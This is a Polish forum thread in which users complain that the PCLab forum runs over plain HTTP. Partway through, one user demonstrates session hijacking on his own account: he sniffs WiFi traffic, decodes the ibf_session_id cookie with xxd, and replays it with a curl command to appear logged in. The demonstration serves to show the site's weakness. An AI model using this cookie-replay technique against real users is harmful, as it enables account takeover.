Połączenie z forum jest "Niezabezpieczone"

[markencjusz 0]

Zamiast zielonej kłódki czerwony wykrzyknik. To coś u mnie czy u was?

[Bono[UG] 1625]

Tutaj. Forum nie ma włączonego szyfrowanego połączenia, leci po http, a nie https.

[markencjusz 0]

Czy w takim razie logowanie się jest bezpieczne?

[Bono[UG] 1625]

Nie jest zabezpieczone.

A czy jest bezpieczne, to już kwestia czy dane wysyłane na forum uznajesz za wrażliwe czy nie. Jeżeli hasło masz takie same jak do poczty czy banku, to masz problem, jeżeli zasadniczo różne, to ja nie widzę tutaj wielkiego niebezpieczeństwa ale niech się lepiej obeznani w temacie wypowiedzą.

[markencjusz 0]

Jakie by nie bylo to bardziej chodzi o kwestie latwego i masowego przejecia kont. Np. nie ufalbym teraz w "forumowa sprzedaz".

[Bono[UG] 1625]

A wcześniej ufałbyś?

Forum nigdy nie miało szyfrowanego połączenia i nie wygląda, żeby były z tego jakieś większe problemy.

[PrimoGhost 50]

Problemy wizerunkowe. Dla forum dużego portalu IT - według mnie są poważnymi problemami.

[jagular 1794]

Dla kogo?

[markencjusz 0]

' date='02 Styczeń 2019 - 15:06' timestamp='1546438011' post='15352131']

A wcześniej ufałbyś?

Forum nigdy nie miało szyfrowanego połączenia i nie wygląda, żeby były z tego jakieś większe problemy.

 

Ja tylko sprzedaję.

Nie zauważyłem tego wcześniej, możliwe że przeglądarki zaczęły informować o tym w bardziej wyraźny sposób. IMO dziwna sytuacja, szyfrowanie połączenia to dziś standard nawet dla strony z firankami, a co dopiero dla dużego forum portalu technologicznego. Sprawia przez to wrażenie porzuconego i zaniedbanego.

[Bono[UG] 1625]

Nie sprawia wrażenia, ono takie jest

[PrimoGhost 50]

Dla kogo?

 

Rigel faken Springer. Co jak co ale ktoś tam się musi zajmować sprawami wizerunkowymi. A posiadanie w 2019 roku portalu z pół minionem użytkowników bez nawet podstawowego szyfrowania - moim zdaniem jest sprawą z zakresu bezpieczeństwa, ale też wizerunku.

[Stjepan 677]

Tak btw newsmani chyba jeszcze mają kaca po sylwestrze, wczoraj 0 newsów, dzisiaj ledwo 2 i 0 o nowych Ryzenach serii 3xxx gdzie na innych portalach już wczoraj była o tym mowa.

[jagular 1794]

Primosku, who gives a f***?

Czy tzw. opinia publiczna wie i się interesuje, że jakiś tam portal komputerowy nie ma kłódeczki przy logowaniu?

Wpływa to na kursy akcji?

Jakieś straty (na chwilę obecną ) z tego powodu?

 

Kiedyś (?) to może wszystko jeb**e z powodu wieku silnika i ogólnego niedopieszczenia wszystkiego. Jakiś chakier uruchomi skrypta i się posypie lolek.

Ale jakie to straty przyniesie? Takie realne, nie związane z marudzeniem nas kilku, 0.1% zarejestrowanych użytkowników?

 

Wizerunek? Panie. To jest portal wszystkomający AD2019. Tu jest tyle godności i dbania o wizerunek, co w artykułach w Fakcie o odpędzaniu ufo czosnkiem

[Karister 1533]

Forum, czy inne strony www same w sobie nie muszą być zabezpieczone przez SSL. Owszem, Google daje od kilku lat bonus do page rank za szyfrowane połączenie dla całej witryny, ale z punktu widzenia bezpieczeństwa zaszyfrowane muszą być tylko HTTP requesty z danymi wrażliwymi. I tutaj HTTP POST z danymi do logowania jest zaszyfrowany. Log z narzędzi developerskich Chrome:

 

Request URL: https://forum.pclab.pl/index.php?app=core&module=global&section=login&do=process
Request Method: POST

Jak się dobrze przyjrzycie, widać, że na czas logowania jest https i zamknięta kłódka w przeglądarce. Po ułamku sekundy przeglądarka jest przekierowana z powrotem na http. Można też podejrzeć ceryfikat:

 

Issued by: GeoTrust RSA CA 2018
Expires: Friday, 5 July 2019 at 14:00:00 CEST

 

EDIT:

Nie bardzo natomiast wiem, czemu po wejściu na https://forum.pclab.pl/index.php?app=core&module=global&section=login w Chrome pojawia się kłódka, a po chwili znika. Możliwe, że przeglądarka nie uznaje tego certyfikatu za wiarygodny. // strzał okazał się trafny - szczegóły w EDIT2 // Wtedy połączenie i tak jest szyfrowane, ale Chrome nie ufa samej stronie www. Czyli samego połączenia nie da się podsłuchać (tzn da, ale jest szyfrowane), ale Chrome nie ufa stronie, że jej oprogramowanie nie wykrada haseł. FireFox natomiast cały czas wyświetla kłódeczkę na stronie logowania. Nie pamiętam, czy zmieniałem domyślne ustawienia swojego Chrome, ale przeglądarki zawsze mają jakieś certyfikaty domyślnie jako zaufane i można do tej listy dodać kolejne.

 

EDIT2:

Google pożarło się z GeoTrust (wykupiony przez Symantec) jakiś rok temu za źle przyznane certyfikaty SSL i wywaliło nadane przez nich certyfikaty z listy zaufanych. Stąd brak kłódeczki w Chrome, mimo https przy logowaniu do PCLab.

Źródła:

https://www.theregister.co.uk/2018/02/07/beware_the_coming_chrome_certificate_apocalypse/

https://sites.google.com/a/chromium.org/dev/Home/chromium-security/symantec-legacy-pki

[Bono[UG] 1625]

A jak ma się sprawa z zapamiętaniem zalogowania w ciastkach, czy ogólnie trzymaniem sesji? Przeglądarka nie wysyła niczego na serwer co umożliwiłoby przejęcie danych logowania lub przynajmniej sesji i podszycie się pod użytkownika?

[amp41 371]

Problem jaki mam z forum nie dotyczy szyfrowania ale tego że muszę korzystać z VPN bo jak mam wyłączone to albo łączy się długo,albo wcale

[Karister 1533]

' date='04 Styczeń 2019 - 12:52' timestamp='1546602757' post='15354533']

A jak ma się sprawa z zapamiętaniem zalogowania w ciastkach, czy ogólnie trzymaniem sesji? Przeglądarka nie wysyła niczego na serwer co umożliwiłoby przejęcie danych logowania lub przynajmniej sesji i podszycie się pod użytkownika?

Http(s) jest protokołem bezstanowym i nie pozwala zapamiętać czegoś takiego, jak zalogowany użytkownik. Dlatego po zalogowaniu tworzy się na kompie użytkownika ciastko z ID sesji (albo przekazuje go w każdym URL) i jest ono wysyłane wraz z każdym zapytaniem HTTP, żeby serwer mógł sprawdzić, kto to zapytanie wysłał. Są ataki polegające na przechwyceniu czyjejś sesji wymierzone zarówno w oprogramowanie na serwerze (np XSS), jak i samego użytkownika (np CSRF). Na każdy z ataków są rozwiązania i tematykę tę dobrze opisuje OWASP. Wydaje mi się, że gdyby ktoś podejrzał moje zapytania do tego forum, gdy jestem zalogowany, mógłby odczytać ID mojej sesji, bo nie ma https i po stworzeniu tego ciasteczka ręcznie na swoim kompie, byłby mną na czas trwania sesji. Stąd czasem można usłyszeć, żeby używać opcji wyloguj, a nie zamykać zakładkę.

[PrimoGhost 50]

@jagular

 

Nie sposób odmówić Ci racji, ale mówimy o dwóch różnych płaszczyznach interesu. Doskonale wiem, jak portal (a zwłaszcza forum jest zaniedbane) ale w przypadku dużej firmy - zwłaszcza zachodniej - jest to co najmniej dziwne. Aktywa, które się nie zwracają, opłacają - wywala się w kosz i tyle. Nie ciągnie się ich za sobą, jak 20 metrowy ogon, który porasta juz mchem.

 

Przecież to jest śmieszne.

 

0.1 % użytkowników - oczywiście, że o nasze "dobra" nikt nie dba i ma je gdzieś. Członkom redakcji kradziono treści i też o to nikt nie dbał. A to była poważniejsza sprawa, niż nasze narzekania.

 

Bardziej chodzi mi o bazę danych użytkowników, która jest spora i wygląda na to, że jest co najmniej słabo chroniona. To jest problem wizerunkowy i jeżeli ktoś go tam w Onecie czy wyżej nie widzi, to jest po prostu głupi. A o rozwiązania nawet nie pytam - usunąć, naprawić, zablokować - każde jest dobre dla ochrony interesu wizerunkowego. Każde - ale nie żadne.

 

Coś jakby.. Elephant in the room.

 

Zachodnie firmy mają fioła na tym punkcie. W zeszłym tygodniu przed siedzibą Pvh przy John hicksstraat popruła się jedna z flag Hilfigera. Tak delikatnie, ale było widać. Pół godziny później już to ktoś naprawiał. Śmiałem się i pytałem czemu to takie ważne? Można to po świętach zrobić, skoro i tak nikogo w siedzibie nie będzie?

 

- no no no no. Reputation...image.

 

Może zły przykład, ale tak to właśnie działa. Niczego nie zostawia się samemu sobie. Bo może zaszkodzić. Likwiduje się, zamyka, naprawia - ale nie olewa. Właśnie w oparciu o te akcje, słupki, pinionszki....

 

@ Karister - dasz radę to z ciekawości sprawdzić? Na jednej przeglądarce jedno konto na drugiej drugie? Jak to tak nie działa, to sorry.

[Bono[UG] 1625]

W sensie, żeby coś napisać

 

Post sponsorowany przez główne konto z Firefox.

[zekker 0]

z dwóch kont na raz?

 

Post sponsorowany przez zapasowe konto (kiedyś było mi potrzebne bez uprawnień) z IE.

[Karister 1533]

@ Karister - dasz radę to z ciekawości sprawdzić? Na jednej przeglądarce jedno konto na drugiej drugie? Jak to tak nie działa, to sorry.

Dwie różne sesje w dwóch różnych przeglądarkach to akurat jest ok. Ja pisałem o wykradaniu czyjejś sesji. Czyli używania forum jako osoba zalogowana bez logowania się. Używałem OSX to "hackingu":

 

Wysyłam zapytanie do PCLab i sprawdzam, czy strona jest spersonalizowana pode mnie:

 

curl -X GET http://forum.pclab.pl/ | grep -i -o karister | wc -l

Wynik: 0, czyli nie ma na stronie słowa "Karister". Jestem anonimowym użytkownikiem dla serwera PCLab.

 

Używam sniffera do nasłuchu sieci WiFi, której właśnie używa Karister i znajduję zapytanie HTTP GET do strony forum.pclab.pl. Fragment pakietu 59 wygląda tak:

 

0750   32 66 33 32 38 3b 20 69 62 66 5f 73 65 73 73 69
0760   6f 6e 5f 69 64 3d 63 31 33 35 61 34 30 35 38 64
0770   63 65 66 36 65 65 65 31 35 65 37 31 34 32 65 33
0780   65 66 62 65 65 31 3b 20 6f 6e 65 74 5f 61 64 62

Tłumaczę z komputerowego na ludzkie:

 

print '32663332383b206962665f73657373696f6e5f69643d63313335613430353864636566366565653135653731343265336566626565313b206f6e65745f616462' | xxd -ps -r

i dostaję:

 

ibf_session_id=c135a4058dcef6eee15e7142e3efbee1

Ze skradzionym ID sesji wysyłam spreparowane zapytanie do PCLab:

 

curl -X GET --cookie "ibf_session_id=c135a4058dcef6eee15e7142e3efbee1" http://forum.pclab.pl/ | grep -i -o karister | wc -l

Wynik: 5. Pięć razy na stronie występuje słowo "Karister". Atak udany. Jestem Karisterem bez logowania. I've been hacked by myself... WoooHoooo!

 

Parę słów na koniec:

ID sesji najwyraźniej się zmienia co jakiś czas. Po kilku minutach zapytania z wykradzionym ID sesji przestają działać i muszę je od nowa kraść. W pełnym pakiecie, z którego był powyższy wycinek, jest trochę innych ciekawych informacji, między innymi hash mojego hasła. Więc wszelkie hasła typu abcdefg do złamania w minutkę. Dlatego polecam menadżery haseł typu LastPass. Wszystkie karty graficzne świata spięte razem nie złamią jego haseł do końca istnienia Ziemi. Szkoda na to prądu. Do tego wycieki baz danych w stylu Morele też nie groźne bo menadżer daje osobne hasło per portal. A teraz muszę szybko logout, bo podałem swoje ID sesji i możecie przez najbliższe 2 sekundy edytować moje posty.

[PrimoGhost 50]

Właśnie to chciałem, żebyś sprobował zrobić

Na drugiej przeglądarce konto duch i jak widać dziala a hash hasła możliwy do zabrania, tak jak myśleliśmy.

 

Katastrofa.

 

Od akcji z Morele zacząłem używać bit warden i losowych haseł. Ale nie sądziłem, że tak szybko znajdę racjonalny powód na jego zastosowanie.

 

# Edit

 

Bono - weź proszę zrób coś dla ludzkości i przetasuj trochę skrzynkę na profilu. Chcę się normalnie zapytać o coś, a tu co? Lico

[Bono[UG] 1625]

Kombinuj, mam wyjadaczowi podpowiadać?

[jagular 1794]

...

 

Zachodnie firmy mają fioła na tym punkcie. W zeszłym tygodniu przed siedzibą Pvh przy John hicksstraat popruła się jedna z flag Hilfigera. Tak delikatnie, ale było widać. Pół godziny później już to ktoś naprawiał. Śmiałem się i pytałem czemu to takie ważne? Można to po świętach zrobić, skoro i tak nikogo w siedzibie nie będzie?

 

- no no no no. Reputation...image.

...

1. To jest Polska. Mimo zmian ustrojowych, tutaj można narobić publicznie obory i wyjść z tego pięknie i powabnie. To nie Zachód, gdzie panuje obsesja "żeby tylko klienci się nie dowiedzieli, że robimy oborę".

2. W Polsce na stanowiskach pracują Polacy i panują polskie standardy obsługi klienta. Cóż z tego, że kapitał zagramaniczny, jak interesy się kręcą w swojskiej oborze? Chrum chrum chrum.

3. Flagę z przykładu, który podałeś widzą wszyscy: klienci, potencjalni influencerzy, CEO, sreo, akcjonariusze, managiement wyższy, niższy, grubszy i chudszy, prasa.

Kto z ludzi, którzy naprawdę mają władzę w Ringierze, interesuje się detalami w jakimś tam pclabie, podzbiorze jakiegoś tam Onetu? Oni (->wiki) mają firmy w 16 krajach, pewnie od ***** medialnych/sieciowych. Niedopieszczenie pclab ginie w tłumie.

4. Istnieje możliwość, że są trudne czasy (finansowo) dla Onetu i coś takiego, jak dopieszczanie działającego w końcu jakoś pclaba, nie widnieje na szczycie listy to-do w tych trudnych czasach.

[Kowal 579]

jagular, aleś im wymówek podrzucił, na dobre 20 lat odkładania upgrade!